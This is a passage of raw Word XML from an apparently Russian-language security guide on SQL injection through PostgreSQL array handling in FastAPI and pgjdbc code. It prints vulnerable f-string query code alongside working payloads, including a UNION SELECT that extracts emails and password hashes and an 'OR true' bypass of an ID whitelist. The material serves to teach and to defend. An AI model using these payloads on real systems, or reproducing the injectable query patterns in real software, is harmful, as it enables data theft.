          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">один scalar вместо list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, поведение зависит от driver и SQL-форматирования.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/users/role")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def by_role(role_ids: list[int],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 = text("SELECT * FROM users WHERE role_id = ANY(:roles)")</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 {"roles": role_ids})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь параметризация через bind variable выглядит безопасно. Но FastAPI принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role_ids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из query string как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?role_ids=1&amp;role_ids=2&amp;role_ids=3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Python list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[1, 2, 3]</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Если атакующий передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">один параметр</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?role_ids=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, FastAPI делает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(single-element list). Без проблем.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если атакующий передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строку</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?role_ids=1+OR+1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, FastAPI пытается parsing как int → 400 status (валидация Pydantic). Bypass: использовать query-string без типизации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">list[str]</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list[int]</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@router.get("/users/role")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def by_role(role_ids: list[str],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 uses raw text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT * FROM users WHERE role_id = ANY(ARRAY[{','.join(role_ids)}])")</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?role_ids=1&amp;role_ids=2)+UNION+SELECT+1,email,password_hash+FROM+users--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После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">','.join(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> получается: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1, 2) UNION SELECT 1, email, password_hash FROM users--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В SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE role_id = ANY(ARRAY[1, 2) UNION SELECT 1, email, password_hash FROM users--])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Классическая UNION-injection через ARRAY-constructor. Особый случай — list-coalescing на стороне Python без валидации каждого элемента.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — containment-bypass через user-controlled array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт проверяет, что user_id входит в whitelist разрешённых ID:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_IDS = [1, 2, 3, 4, 5]</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@router.get("/users/profile/{user_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def profile(user_id: int, extra_ids_array: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 extra_ids_array — pre-quoted PG array literal, e.g. '{6,7,8}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE id = {user_id}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        AND id = ANY(ARRAY{ALLOWED_IDS}::int[] || '{extra_ids_array}'::int[])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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalar()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">extra_ids_array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ожидается как PG array literal — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'{6,7,8}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий контролирует строку.</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extra_ids_array</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{99}'::int[] OR true OR ARRAY[1]='{1}</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 FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND id = ANY(ARRAY[1,2,3,4,5]::int[] || '{99}'::int[] OR true OR ARRAY[1]='{1}'::int[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из-за operator precedence, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> короткозамыкает всю WHERE-condition — возвращает все строки. Apparent ANY-containment-check обойден.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload D — driver-specific: pgjdbc unnest expansion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: pgjdbc-приложение использует named-parameter library, которая разворачивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:param</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> IN-список в indivudual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-bindings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String sql = "SELECT * FROM users WHERE id IN (:ids)";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jdbcTemplate.queryForList(sql, new MapSqlParameterSource("ids", List.of(1, 2, 3)));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// pgjdbc-template разворачивает в: SELECT * FROM users WHERE id IN (?, ?, ?) с bind [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это безопасный паттерн. Но если приложение использует unnest() для эквивалентной функциональности:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String sql = "SELECT * FROM users WHERE id IN (SELECT unnest(?::int[]))";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jdbcTemplate.queryForList(sql, idArray);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">idArray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JDBC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> объект. Если атакующий контролирует array-содержимое (через JSON-десериализацию, например), он может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">внутри элемента array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> инжектировать неожиданное значение... но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
